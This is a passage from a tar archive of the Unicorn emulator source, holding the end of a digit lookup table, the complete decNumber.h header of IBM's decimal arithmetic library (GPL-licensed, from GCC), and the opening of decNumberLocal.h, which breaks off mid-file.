1,6,4,3, 1,6,5,3, 1,6,6,3, 1,6,7,3, 1,6,8,3, 1,6,9,3, 1,7,0,3, 1,7,1,3, 1,7,2,3, 1,7,3,3, 1,7,4,3, 1,7,5,3, 1,7,6,3, 1,7,7,3, 1,7,8,3, 1,7,9,3, 1,8,0,3, 1,8,1,3, 1,8,2,3, 1,8,3,3, 1,8,4,3, 1,8,5,3, 1,8,6,3, 1,8,7,3, 1,8,8,3, 1,8,9,3, 1,9,0,3, 1,9,1,3, 1,9,2,3, 1,9,3,3, 1,9,4,3, 1,9,5,3, 1,9,6,3, 1,9,7,3, 1,9,8,3, 1,9,9,3, 2,0,0,3, 2,0,1,3, 2,0,2,3, 2,0,3,3, 2,0,4,3, 2,0,5,3, 2,0,6,3, 2,0,7,3, 2,0,8,3, 2,0,9,3, 2,1,0,3, 2,1,1,3, 2,1,2,3, 2,1,3,3, 2,1,4,3, 2,1,5,3, 2,1,6,3, 2,1,7,3, 2,1,8,3, 2,1,9,3, 2,2,0,3, 2,2,1,3, 2,2,2,3, 2,2,3,3, 2,2,4,3, 2,2,5,3, 2,2,6,3, 2,2,7,3, 2,2,8,3, 2,2,9,3, 2,3,0,3, 2,3,1,3, 2,3,2,3, 2,3,3,3, 2,3,4,3, 2,3,5,3, 2,3,6,3, 2,3,7,3, 2,3,8,3, 2,3,9,3, 2,4,0,3, 2,4,1,3, 2,4,2,3, 2,4,3,3, 2,4,4,3, 2,4,5,3, 2,4,6,3, 2,4,7,3, 2,4,8,3, 2,4,9,3, 2,5,0,3, 2,5,1,3, 2,5,2,3, 2,5,3,3, 2,5,4,3, 2,5,5,3, 2,5,6,3, 2,5,7,3, 2,5,8,3, 2,5,9,3, 2,6,0,3, 2,6,1,3, 2,6,2,3, 2,6,3,3, 2,6,4,3, 2,6,5,3, 2,6,6,3, 2,6,7,3, 2,6,8,3, 2,6,9,3, 2,7,0,3, 2,7,1,3, 2,7,2,3, 2,7,3,3, 2,7,4,3, 2,7,5,3, 2,7,6,3, 2,7,7,3, 2,7,8,3, 2,7,9,3, 2,8,0,3, 2,8,1,3, 2,8,2,3, 2,8,3,3, 2,8,4,3, 2,8,5,3, 2,8,6,3, 2,8,7,3, 2,8,8,3, 2,8,9,3, 2,9,0,3, 2,9,1,3, 2,9,2,3, 2,9,3,3, 2,9,4,3, 2,9,5,3, 2,9,6,3, 2,9,7,3, 2,9,8,3, 2,9,9,3, 3,0,0,3, 3,0,1,3, 3,0,2,3, 3,0,3,3, 3,0,4,3, 3,0,5,3, 3,0,6,3, 3,0,7,3, 3,0,8,3, 3,0,9,3, 3,1,0,3, 3,1,1,3, 3,1,2,3, 3,1,3,3, 3,1,4,3, 3,1,5,3, 3,1,6,3, 3,1,7,3, 3,1,8,3, 3,1,9,3, 3,2,0,3, 3,2,1,3, 3,2,2,3, 3,2,3,3, 3,2,4,3, 3,2,5,3, 3,2,6,3, 3,2,7,3, 3,2,8,3, 3,2,9,3, 3,3,0,3, 3,3,1,3, 3,3,2,3, 3,3,3,3, 3,3,4,3, 3,3,5,3, 3,3,6,3, 3,3,7,3, 3,3,8,3, 3,3,9,3, 3,4,0,3, 3,4,1,3, 3,4,2,3, 3,4,3,3, 3,4,4,3, 3,4,5,3, 3,4,6,3, 3,4,7,3, 3,4,8,3, 3,4,9,3, 3,5,0,3, 3,5,1,3, 3,5,2,3, 3,5,3,3, 3,5,4,3, 3,5,5,3, 3,5,6,3, 3,5,7,3, 3,5,8,3, 3,5,9,3, 3,6,0,3, 3,6,1,3, 3,6,2,3, 3,6,3,3, 3,6,4,3, 3,6,5,3, 3,6,6,3, 3,6,7,3, 3,6,8,3, 3,6,9,3, 3,7,0,3, 3,7,1,3, 3,7,2,3, 3,7,3,3, 3,7,4,3, 3,7,5,3, 3,7,6,3, 3,7,7,3, 3,7,8,3, 3,7,9,3, 3,8,0,3, 3,8,1,3, 3,8,2,3, 3,8,3,3, 3,8,4,3, 3,8,5,3, 3,8,6,3, 3,8,7,3, 3,8,8,3, 3,8,9,3, 3,9,0,3, 3,9,1,3, 3,9,2,3, 3,9,3,3, 3,9,4,3, 3,9,5,3, 3,9,6,3, 3,9,7,3, 3,9,8,3, 3,9,9,3, 4,0,0,3, 4,0,1,3, 4,0,2,3, 4,0,3,3, 4,0,4,3, 4,0,5,3, 4,0,6,3, 4,0,7,3, 4,0,8,3, 4,0,9,3, 4,1,0,3, 4,1,1,3, 4,1,2,3, 4,1,3,3, 4,1,4,3, 4,1,5,3, 4,1,6,3, 4,1,7,3, 4,1,8,3, 4,1,9,3, 4,2,0,3, 4,2,1,3, 4,2,2,3, 4,2,3,3, 4,2,4,3, 4,2,5,3, 4,2,6,3, 4,2,7,3, 4,2,8,3, 4,2,9,3, 4,3,0,3, 4,3,1,3, 4,3,2,3, 4,3,3,3, 4,3,4,3, 4,3,5,3, 4,3,6,3, 4,3,7,3, 4,3,8,3, 4,3,9,3, 4,4,0,3, 4,4,1,3, 4,4,2,3, 4,4,3,3, 4,4,4,3, 4,4,5,3, 4,4,6,3, 4,4,7,3, 4,4,8,3, 4,4,9,3, 4,5,0,3, 4,5,1,3, 4,5,2,3, 4,5,3,3, 4,5,4,3, 4,5,5,3, 4,5,6,3, 4,5,7,3, 4,5,8,3, 4,5,9,3, 4,6,0,3, 4,6,1,3, 4,6,2,3, 4,6,3,3, 4,6,4,3, 4,6,5,3, 4,6,6,3, 4,6,7,3, 4,6,8,3, 4,6,9,3, 4,7,0,3, 4,7,1,3, 4,7,2,3, 4,7,3,3, 4,7,4,3, 4,7,5,3, 4,7,6,3, 4,7,7,3, 4,7,8,3, 4,7,9,3, 4,8,0,3, 4,8,1,3, 4,8,2,3, 4,8,3,3, 4,8,4,3, 4,8,5,3, 4,8,6,3, 4,8,7,3, 4,8,8,3, 4,8,9,3, 4,9,0,3, 4,9,1,3, 4,9,2,3, 4,9,3,3, 4,9,4,3, 4,9,5,3, 4,9,6,3, 4,9,7,3, 4,9,8,3, 4,9,9,3, 5,0,0,3, 5,0,1,3, 5,0,2,3, 5,0,3,3, 5,0,4,3, 5,0,5,3, 5,0,6,3, 5,0,7,3, 5,0,8,3, 5,0,9,3, 5,1,0,3, 5,1,1,3, 5,1,2,3, 5,1,3,3, 5,1,4,3, 5,1,5,3, 5,1,6,3, 5,1,7,3, 5,1,8,3, 5,1,9,3, 5,2,0,3, 5,2,1,3, 5,2,2,3, 5,2,3,3, 5,2,4,3, 5,2,5,3, 5,2,6,3, 5,2,7,3, 5,2,8,3, 5,2,9,3, 5,3,0,3, 5,3,1,3, 5,3,2,3, 5,3,3,3, 5,3,4,3, 5,3,5,3, 5,3,6,3, 5,3,7,3, 5,3,8,3, 5,3,9,3, 5,4,0,3, 5,4,1,3, 5,4,2,3, 5,4,3,3, 5,4,4,3, 5,4,5,3, 5,4,6,3, 5,4,7,3, 5,4,8,3, 5,4,9,3, 5,5,0,3, 5,5,1,3, 5,5,2,3, 5,5,3,3, 5,5,4,3, 5,5,5,3, 5,5,6,3, 5,5,7,3, 5,5,8,3, 5,5,9,3, 5,6,0,3, 5,6,1,3, 5,6,2,3, 5,6,3,3, 5,6,4,3, 5,6,5,3, 5,6,6,3, 5,6,7,3, 5,6,8,3, 5,6,9,3, 5,7,0,3, 5,7,1,3, 5,7,2,3, 5,7,3,3, 5,7,4,3, 5,7,5,3, 5,7,6,3, 5,7,7,3, 5,7,8,3, 5,7,9,3, 5,8,0,3, 5,8,1,3, 5,8,2,3, 5,8,3,3, 5,8,4,3, 5,8,5,3, 5,8,6,3, 5,8,7,3, 5,8,8,3, 5,8,9,3, 5,9,0,3, 5,9,1,3, 5,9,2,3, 5,9,3,3, 5,9,4,3, 5,9,5,3, 5,9,6,3, 5,9,7,3, 5,9,8,3, 5,9,9,3, 6,0,0,3, 6,0,1,3, 6,0,2,3, 6,0,3,3, 6,0,4,3, 6,0,5,3, 6,0,6,3, 6,0,7,3, 6,0,8,3, 6,0,9,3, 6,1,0,3, 6,1,1,3, 6,1,2,3, 6,1,3,3, 6,1,4,3, 6,1,5,3, 6,1,6,3, 6,1,7,3, 6,1,8,3, 6,1,9,3, 6,2,0,3, 6,2,1,3, 6,2,2,3, 6,2,3,3, 6,2,4,3, 6,2,5,3, 6,2,6,3, 6,2,7,3, 6,2,8,3, 6,2,9,3, 6,3,0,3, 6,3,1,3, 6,3,2,3, 6,3,3,3, 6,3,4,3, 6,3,5,3, 6,3,6,3, 6,3,7,3, 6,3,8,3, 6,3,9,3, 6,4,0,3, 6,4,1,3, 6,4,2,3, 6,4,3,3, 6,4,4,3, 6,4,5,3, 6,4,6,3, 6,4,7,3, 6,4,8,3, 6,4,9,3, 6,5,0,3, 6,5,1,3, 6,5,2,3, 6,5,3,3, 6,5,4,3, 6,5,5,3, 6,5,6,3, 6,5,7,3, 6,5,8,3, 6,5,9,3, 6,6,0,3, 6,6,1,3, 6,6,2,3, 6,6,3,3, 6,6,4,3, 6,6,5,3, 6,6,6,3, 6,6,7,3, 6,6,8,3, 6,6,9,3, 6,7,0,3, 6,7,1,3, 6,7,2,3, 6,7,3,3, 6,7,4,3, 6,7,5,3, 6,7,6,3, 6,7,7,3, 6,7,8,3, 6,7,9,3, 6,8,0,3, 6,8,1,3, 6,8,2,3, 6,8,3,3, 6,8,4,3, 6,8,5,3, 6,8,6,3, 6,8,7,3, 6,8,8,3, 6,8,9,3, 6,9,0,3, 6,9,1,3, 6,9,2,3, 6,9,3,3, 6,9,4,3, 6,9,5,3, 6,9,6,3, 6,9,7,3, 6,9,8,3, 6,9,9,3, 7,0,0,3, 7,0,1,3, 7,0,2,3, 7,0,3,3, 7,0,4,3, 7,0,5,3, 7,0,6,3, 7,0,7,3, 7,0,8,3, 7,0,9,3, 7,1,0,3, 7,1,1,3, 7,1,2,3, 7,1,3,3, 7,1,4,3, 7,1,5,3, 7,1,6,3, 7,1,7,3, 7,1,8,3, 7,1,9,3, 7,2,0,3, 7,2,1,3, 7,2,2,3, 7,2,3,3, 7,2,4,3, 7,2,5,3, 7,2,6,3, 7,2,7,3, 7,2,8,3, 7,2,9,3, 7,3,0,3, 7,3,1,3, 7,3,2,3, 7,3,3,3, 7,3,4,3, 7,3,5,3, 7,3,6,3, 7,3,7,3, 7,3,8,3, 7,3,9,3, 7,4,0,3, 7,4,1,3, 7,4,2,3, 7,4,3,3, 7,4,4,3, 7,4,5,3, 7,4,6,3, 7,4,7,3, 7,4,8,3, 7,4,9,3, 7,5,0,3, 7,5,1,3, 7,5,2,3, 7,5,3,3, 7,5,4,3, 7,5,5,3, 7,5,6,3, 7,5,7,3, 7,5,8,3, 7,5,9,3, 7,6,0,3, 7,6,1,3, 7,6,2,3, 7,6,3,3, 7,6,4,3, 7,6,5,3, 7,6,6,3, 7,6,7,3, 7,6,8,3, 7,6,9,3, 7,7,0,3, 7,7,1,3, 7,7,2,3, 7,7,3,3, 7,7,4,3, 7,7,5,3, 7,7,6,3, 7,7,7,3, 7,7,8,3, 7,7,9,3, 7,8,0,3, 7,8,1,3, 7,8,2,3, 7,8,3,3, 7,8,4,3, 7,8,5,3, 7,8,6,3, 7,8,7,3, 7,8,8,3, 7,8,9,3, 7,9,0,3, 7,9,1,3, 7,9,2,3, 7,9,3,3, 7,9,4,3, 7,9,5,3, 7,9,6,3, 7,9,7,3, 7,9,8,3, 7,9,9,3, 8,0,0,3, 8,0,1,3, 8,0,2,3, 8,0,3,3, 8,0,4,3, 8,0,5,3, 8,0,6,3, 8,0,7,3, 8,0,8,3, 8,0,9,3, 8,1,0,3, 8,1,1,3, 8,1,2,3, 8,1,3,3, 8,1,4,3, 8,1,5,3, 8,1,6,3, 8,1,7,3, 8,1,8,3, 8,1,9,3, 8,2,0,3, 8,2,1,3, 8,2,2,3, 8,2,3,3, 8,2,4,3, 8,2,5,3, 8,2,6,3, 8,2,7,3, 8,2,8,3, 8,2,9,3, 8,3,0,3, 8,3,1,3, 8,3,2,3, 8,3,3,3, 8,3,4,3, 8,3,5,3, 8,3,6,3, 8,3,7,3, 8,3,8,3, 8,3,9,3, 8,4,0,3, 8,4,1,3, 8,4,2,3, 8,4,3,3, 8,4,4,3, 8,4,5,3, 8,4,6,3, 8,4,7,3, 8,4,8,3, 8,4,9,3, 8,5,0,3, 8,5,1,3, 8,5,2,3, 8,5,3,3, 8,5,4,3, 8,5,5,3, 8,5,6,3, 8,5,7,3, 8,5,8,3, 8,5,9,3, 8,6,0,3, 8,6,1,3, 8,6,2,3, 8,6,3,3, 8,6,4,3, 8,6,5,3, 8,6,6,3, 8,6,7,3, 8,6,8,3, 8,6,9,3, 8,7,0,3, 8,7,1,3, 8,7,2,3, 8,7,3,3, 8,7,4,3, 8,7,5,3, 8,7,6,3, 8,7,7,3, 8,7,8,3, 8,7,9,3, 8,8,0,3, 8,8,1,3, 8,8,2,3, 8,8,3,3, 8,8,4,3, 8,8,5,3, 8,8,6,3, 8,8,7,3, 8,8,8,3, 8,8,9,3, 8,9,0,3, 8,9,1,3, 8,9,2,3, 8,9,3,3, 8,9,4,3, 8,9,5,3, 8,9,6,3, 8,9,7,3, 8,9,8,3, 8,9,9,3, 9,0,0,3, 9,0,1,3, 9,0,2,3, 9,0,3,3, 9,0,4,3, 9,0,5,3, 9,0,6,3, 9,0,7,3, 9,0,8,3, 9,0,9,3, 9,1,0,3, 9,1,1,3, 9,1,2,3, 9,1,3,3, 9,1,4,3, 9,1,5,3, 9,1,6,3, 9,1,7,3, 9,1,8,3, 9,1,9,3, 9,2,0,3, 9,2,1,3, 9,2,2,3, 9,2,3,3, 9,2,4,3, 9,2,5,3, 9,2,6,3, 9,2,7,3, 9,2,8,3, 9,2,9,3, 9,3,0,3, 9,3,1,3, 9,3,2,3, 9,3,3,3, 9,3,4,3, 9,3,5,3, 9,3,6,3, 9,3,7,3, 9,3,8,3, 9,3,9,3, 9,4,0,3, 9,4,1,3, 9,4,2,3, 9,4,3,3, 9,4,4,3, 9,4,5,3, 9,4,6,3, 9,4,7,3, 9,4,8,3, 9,4,9,3, 9,5,0,3, 9,5,1,3, 9,5,2,3, 9,5,3,3, 9,5,4,3, 9,5,5,3, 9,5,6,3, 9,5,7,3, 9,5,8,3, 9,5,9,3, 9,6,0,3, 9,6,1,3, 9,6,2,3, 9,6,3,3, 9,6,4,3, 9,6,5,3, 9,6,6,3, 9,6,7,3, 9,6,8,3, 9,6,9,3, 9,7,0,3, 9,7,1,3, 9,7,2,3, 9,7,3,3, 9,7,4,3, 9,7,5,3, 9,7,6,3, 9,7,7,3, 9,7,8,3, 9,7,9,3, 9,8,0,3, 9,8,1,3, 9,8,2,3, 9,8,3,3, 9,8,4,3, 9,8,5,3, 9,8,6,3, 9,8,7,3, 9,8,8,3, 9,8,9,3, 9,9,0,3, 9,9,1,3, 9,9,2,3, 9,9,3,3, 9,9,4,3, 9,9,5,3, 9,9,6,3, 9,9,7,3, 9,9,8,3, 9,9,9,3}; #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/libdecnumber/decNumber.h�������������������������������������������������0000664�0000000�0000000�00000025615�14675241067�0022317�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Decimal number arithmetic module header for the decNumber C Library. Copyright (C) 2005, 2007 Free Software Foundation, Inc. Contributed by IBM Corporation. Author Mike Cowlishaw. This file is part of GCC. GCC is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version. In addition to the permissions in the GNU General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those combinations without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into a combine executable.) GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING. If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* ------------------------------------------------------------------ */ /* Decimal Number arithmetic module header */ /* ------------------------------------------------------------------ */ #ifndef DECNUMBER_H #define DECNUMBER_H #define DECNAME "decNumber" /* Short name */ #define DECFULLNAME "Decimal Number Module" /* Verbose name */ #define DECAUTHOR "Mike Cowlishaw" /* Who to blame */ #include "libdecnumber/decContext.h" /* Bit settings for decNumber.bits */ #define DECNEG 0x80 /* Sign; 1=negative, 0=positive or zero */ #define DECINF 0x40 /* 1=Infinity */ #define DECNAN 0x20 /* 1=NaN */ #define DECSNAN 0x10 /* 1=sNaN */ /* The remaining bits are reserved; they must be 0 */ #define DECSPECIAL (DECINF|DECNAN|DECSNAN) /* any special value */ /* Define the decNumber data structure. The size and shape of the */ /* units array in the structure is determined by the following */ /* constant. This must not be changed without recompiling the */ /* decNumber library modules. */ #define DECDPUN 3 /* DECimal Digits Per UNit [must be >0 */ /* and <10; 3 or powers of 2 are best]. */ /* DECNUMDIGITS is the default number of digits that can be held in */ /* the structure. If undefined, 1 is assumed and it is assumed */ /* that the structure will be immediately followed by extra space, */ /* as required. DECNUMDIGITS is always >0. */ #if !defined(DECNUMDIGITS) #define DECNUMDIGITS 1 #endif /* The size (integer data type) of each unit is determined by the */ /* number of digits it will hold. */ #if DECDPUN<=2 #define decNumberUnit uint8_t #elif DECDPUN<=4 #define decNumberUnit uint16_t #else #define decNumberUnit uint32_t #endif /* The number of units needed is ceil(DECNUMDIGITS/DECDPUN) */ #define DECNUMUNITS ((DECNUMDIGITS+DECDPUN-1)/DECDPUN) /* The data structure... */ typedef struct { int32_t digits; /* Count of digits in the coefficient; >0 */ int32_t exponent; /* Unadjusted exponent, unbiased, in */ /* range: -1999999997 through 999999999 */ uint8_t bits; /* Indicator bits (see above) */ /* Coefficient, from least significant unit */ decNumberUnit lsu[DECNUMUNITS]; } decNumber; /* Notes: */ /* 1. If digits is > DECDPUN then there will one or more */ /* decNumberUnits immediately following the first element of lsu.*/ /* These contain the remaining (more significant) digits of the */ /* number, and may be in the lsu array, or may be guaranteed by */ /* some other mechanism (such as being contained in another */ /* structure, or being overlaid on dynamically allocated */ /* storage). */ /* */ /* Each integer of the coefficient (except potentially the last) */ /* contains DECDPUN digits (e.g., a value in the range 0 through */ /* 99999999 if DECDPUN is 8, or 0 through 999 if DECDPUN is 3). */ /* */ /* 2. A decNumber converted to a string may need up to digits+14 */ /* characters. The worst cases (non-exponential and exponential */ /* formats) are -0.00000{9...}# and -9.{9...}E+999999999# */ /* (where # is '\0') */ /* ---------------------------------------------------------------- */ /* decNumber public functions and macros */ /* ---------------------------------------------------------------- */ /* Conversions */ decNumber * decNumberFromInt32(decNumber *, int32_t); decNumber * decNumberFromUInt32(decNumber *, uint32_t); decNumber *decNumberFromInt64(decNumber *, int64_t); decNumber *decNumberFromUInt64(decNumber *, uint64_t); decNumber * decNumberFromString(decNumber *, const char *, decContext *); char * decNumberToString(const decNumber *, char *); char * decNumberToEngString(const decNumber *, char *); uint32_t decNumberToUInt32(const decNumber *, decContext *); int32_t decNumberToInt32(const decNumber *, decContext *); int64_t decNumberIntegralToInt64(const decNumber *dn, decContext *set); uint8_t * decNumberGetBCD(const decNumber *, uint8_t *); decNumber * decNumberSetBCD(decNumber *, const uint8_t *, uint32_t); /* Operators and elementary functions */ decNumber * decNumberAbs(decNumber *, const decNumber *, decContext *); decNumber * decNumberAdd(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberAnd(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberCompare(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberCompareSignal(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberCompareTotal(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberCompareTotalMag(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberDivide(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberDivideInteger(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberExp(decNumber *, const decNumber *, decContext *); decNumber * decNumberFMA(decNumber *, const decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberInvert(decNumber *, const decNumber *, decContext *); decNumber * decNumberLn(decNumber *, const decNumber *, decContext *); decNumber * decNumberLogB(decNumber *, const decNumber *, decContext *); decNumber * decNumberLog10(decNumber *, const decNumber *, decContext *); decNumber * decNumberMax(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberMaxMag(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberMin(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberMinMag(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberMinus(decNumber *, const decNumber *, decContext *); decNumber * decNumberMultiply(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberNormalize(decNumber *, const decNumber *, decContext *); decNumber * decNumberOr(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberPlus(decNumber *, const decNumber *, decContext *); decNumber * decNumberPower(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberQuantize(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberReduce(decNumber *, const decNumber *, decContext *); decNumber * decNumberRemainder(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberRemainderNear(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberRescale(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberRotate(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberSameQuantum(decNumber *, const decNumber *, const decNumber *); decNumber * decNumberScaleB(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberShift(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberSquareRoot(decNumber *, const decNumber *, decContext *); decNumber * decNumberSubtract(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberToIntegralExact(decNumber *, const decNumber *, decContext *); decNumber * decNumberToIntegralValue(decNumber *, const decNumber *, decContext *); decNumber * decNumberXor(decNumber *, const decNumber *, const decNumber *, decContext *); /* Utilities */ enum decClass decNumberClass(const decNumber *, decContext *); const char * decNumberClassToString(enum decClass); decNumber * decNumberCopy(decNumber *, const decNumber *); decNumber * decNumberCopyAbs(decNumber *, const decNumber *); decNumber * decNumberCopyNegate(decNumber *, const decNumber *); decNumber * decNumberCopySign(decNumber *, const decNumber *, const decNumber *); decNumber * decNumberNextMinus(decNumber *, const decNumber *, decContext *); decNumber * decNumberNextPlus(decNumber *, const decNumber *, decContext *); decNumber * decNumberNextToward(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberTrim(decNumber *); const char * decNumberVersion(void); decNumber * decNumberZero(decNumber *); /* Functions for testing decNumbers (normality depends on context) */ int32_t decNumberIsNormal(const decNumber *, decContext *); int32_t decNumberIsSubnormal(const decNumber *, decContext *); /* Macros for testing decNumber *dn */ #define decNumberIsCanonical(dn) (1) /* All decNumbers are saintly */ #define decNumberIsFinite(dn) (((dn)->bits&DECSPECIAL)==0) #define decNumberIsInfinite(dn) (((dn)->bits&DECINF)!=0) #define decNumberIsNaN(dn) (((dn)->bits&(DECNAN|DECSNAN))!=0) #define decNumberIsNegative(dn) (((dn)->bits&DECNEG)!=0) #define decNumberIsQNaN(dn) (((dn)->bits&(DECNAN))!=0) #define decNumberIsSNaN(dn) (((dn)->bits&(DECSNAN))!=0) #define decNumberIsSpecial(dn) (((dn)->bits&DECSPECIAL)!=0) #define decNumberIsZero(dn) (*(dn)->lsu==0 \ && (dn)->digits==1 \ && (((dn)->bits&DECSPECIAL)==0)) #define decNumberRadix(dn) (10) #endif �������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/libdecnumber/decNumberLocal.h��������������������������������������������0000664�0000000�0000000�00000070545�14675241067�0023274�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Local definitions for the decNumber C Library. Copyright (C) 2007 Free Software Foundation, Inc. Contributed by IBM Corporation. Author Mike Cowlishaw. This file is part of GCC. GCC is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version. In addition to the permissions in the GNU General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those combinations without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into a combine executable.) GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING. If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* ------------------------------------------------------------------ */ /* decNumber package local type, tuning, and macro definitions */ /* ------------------------------------------------------------------ */ /* This header file is included by all modules in the decNumber */ /* library, and contains local type definitions, tuning parameters, */ /* etc. It should not need to be used by application programs. */ /* decNumber.h or one of decDouble (etc.) must be included first. */ /* ------------------------------------------------------------------ */ #ifndef DECNUMBERLOCAL_H #define DECNUMBERLOCAL_H #define DECVERSION "decNumber 3.53" /* Package Version [16 max.] */ #define DECNLAUTHOR "Mike Cowlishaw" /* Who to blame */ #include "libdecnumber/dconfig.h" #include "libdecnumber/decContext.h" /* Conditional code flag -- set this to match hardware platform */ /* 1=little-endian, 0=big-endian */ #if WORDS_BIGENDIAN #define DECLITEND 0 #else #define DECLITEND 1 #endif /* Conditional code flag -- set this to 1 for best performance */ #define DECUSE64 1 /* 1=use int64s, 0=int32 & smaller only */ /* Conditional check flags -- set these to 0 for best performance */ #define DECCHECK 0 /* 1 to enable robust checking */ #define DECALLOC 0 /* 1 to enable memory accounting */ #define DECTRACE 0 /* 1 to trace certain internals, etc. */ /* Tuning parameter for decNumber (arbitrary precision) module */ #define DECBUFFER 36 /* Size basis for local buffers. This */ /* should be a common maximum precision */ /* rounded up to a multiple of 4; must */ /* be zero or positive. */ /* ---------------------------------------------------------------- */ /* Definitions for all modules (general-purpose) */ /* ---------------------------------------------------------------- */ /* Local names for common types -- for safety, decNumber modules do */ /* not use int or long directly. */ #define Flag uint8_t #define Byte int8_t #define uByte uint8_t #define Short int16_t #define uShort uint16_t #define Int int32_t #define uInt uint32_t #define Unit decNumberUnit #if DECUSE64 #define Long int64_t #define uLong uint64_t #endif /* Development-use definitions */ typedef long int LI; /* for printf arguments only */ #define DECNOINT 0 /* 1 to check no internal use of 'int' */ #if DECNOINT /* if these interfere with your C includes, do not set DECNOINT */ #define int ? /* enable to ensure that plain C 'int' */ #define long ?? /* .. or 'long' types are not used */ #endif /* Shared lookup tables */ extern const uByte DECSTICKYTAB[10]; /* re-round digits if sticky */ extern const uLong DECPOWERS[19]; /* powers of ten table */ /* The following are included from decDPD.h */ extern const uShort DPD2BIN[1024]; /* DPD -> 0-999 */ extern const uShort BIN2DPD[1000]; /* 0-999 -> DPD */ extern const uInt DPD2BINK[1024]; /* DPD -> 0-999000 */ extern const uInt DPD2BINM[1024]; /* DPD -> 0-999000000 */ extern const uByte DPD2BCD8[4096]; /* DPD -> ddd + len */ extern const uByte BIN2BCD8[4000]; /* 0-999 -> ddd + len */ extern const uShort BCD2DPD[2458]; /* 0-0x999 -> DPD (0x999=2457)*/ /* LONGMUL32HI -- set w=(u*v)>>32, where w, u, and v are uInts */ /* (that is, sets w to be the high-order word of the 64-bit result; */ /* the low-order word is simply u*v.) */ /* This version is derived from Knuth via Hacker's Delight; */ /* it seems to optimize better than some others tried */ #define LONGMUL32HI(w, u, v) { \ uInt u0, u1, v0, v1, w0, w1, w2, t; \ u0=u & 0xffff; u1=u>>16; \ v0=v & 0xffff; v1=v>>16; \ w0=u0*v0; \ t=u1*v0 + (w0>>16); \ w1=t & 0xffff; w2=t>>16; \ w1=u0*v1 + w1; \ (w)=u1*v1 + w2 + (w1>>16);} /* ROUNDUP -- round an integer up to a multiple of n */ #define ROUNDUP(i, n) ((((i)+(n)-1)/n)*n) /* ROUNDDOWN -- round an integer down to a multiple of n */ #define ROUNDDOWN(i, n) (((i)/n)*n) #define ROUNDDOWN4(i) ((i)&~3) /* special for n=4 */ /* References to multi-byte sequences under different sizes */ /* Refer to a uInt from four bytes starting at a char* or uByte*, */ /* etc. */ #define UINTAT(b) (*((uInt *)(b))) #define USHORTAT(b) (*((uShort *)(b))) #define UBYTEAT(b) (*((uByte *)(b))) /* X10 and X100 -- multiply integer i by 10 or 100 */ /* [shifts are usually faster than multiply; could be conditional] */ #define X10(i) (((i)<<1)+((i)<<3)) #define X100(i) (((i)<<2)+((i)<<5)+((i)<<6)) /* MAXI and MINI -- general max & min (not in ANSI) for integers */ #define MAXI(x,y) ((x)<(y)?(y):(x)) #define MINI(x,y) ((x)>(y)?(y):(x)) /* Useful constants */ #define BILLION 1000000000 /* 10**9 */ /* CHARMASK: 0x30303030 for ASCII/UTF8; 0xF0F0F0F0 for EBCDIC */ #define CHARMASK ((((((((uInt)'0')<<8)+'0')<<8)+'0')<<8)+'0') /* ---------------------------------------------------------------- */ /* Definitions for arbitrary-precision modules (only valid after */ /* decNumber.h has been included) */ /* ---------------------------------------------------------------- */ /* Limits and constants */ #define DECNUMMAXP 999999999 /* maximum precision code can handle */ #define DECNUMMAXE 999999999 /* maximum adjusted exponent ditto */ #define DECNUMMINE -999999999 /* minimum adjusted exponent ditto 